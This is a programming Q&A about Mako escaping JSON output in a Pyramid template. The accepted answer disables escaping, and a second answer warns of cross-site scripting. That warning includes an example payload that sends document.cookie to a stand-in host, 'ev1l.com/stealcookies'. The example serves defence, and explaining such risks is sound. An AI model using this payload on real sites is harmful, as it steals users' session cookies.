# &#34; appears in JSONEncoder output, input is Python list of strings

Tags: python, json, pyramid, python-2.6, mako

I'm reading a text file, splitting it on `\n` and putting the results in a Python list.

I'm then using `JSONEncoder().encode(mylist)`, but the result throws errors as it produces the javascript:

```
var jslist = [&#34;List item 1&#34;, &#34;List item 2&#34;]
```

I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.

**Update:** The context is a pyramid application, here's the end of the function (*components* is the name of the list:

```
return {'components': JSONEncoder().encode(components)}
```

and then in the mako template:

```
var components = ${components};
```

which is being replaced as above.

Comment: The JSONEncoder does not do this, it is most likely whatever you are given the resulting output to that is escaping special characters. What are you passing it to?

Comment: Updated with Pyramid/Mako details.

Answer (score 3, accepted):

mako is escaping your strings because it's a sane default for most purposes. You can turn off the escaping on a case-by-case basis:

`${components | n}`

Answer (score 0):

If you are embedding the JSON on a HTML page, beware. As Mako does not know about script tags, so it goes on to escape the string using the standard escapes. However a `<script>` tag has different escaping rules. Notably, NOT escaping makes your site prone to Cross-Site Scripting attacks if the JSON contains user-generated data. Consider the following info in User-editable field (user.name)

```
 user.name = "</script><script language='javascript'>" +
     "document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
     "+ document.cookie + '/>');</script><script language='vbscript'>"
```

Alas, Python JSON encoder does not have an option for safely encoding JSON so that it
is embeddable within HTML - or even Javascript (a bug has been entered into Python bug db). Meanwhile you should use `ensure_ascii=True` + replace all `'<'` with `'\\u003c'` to avoid hacking by malicious users.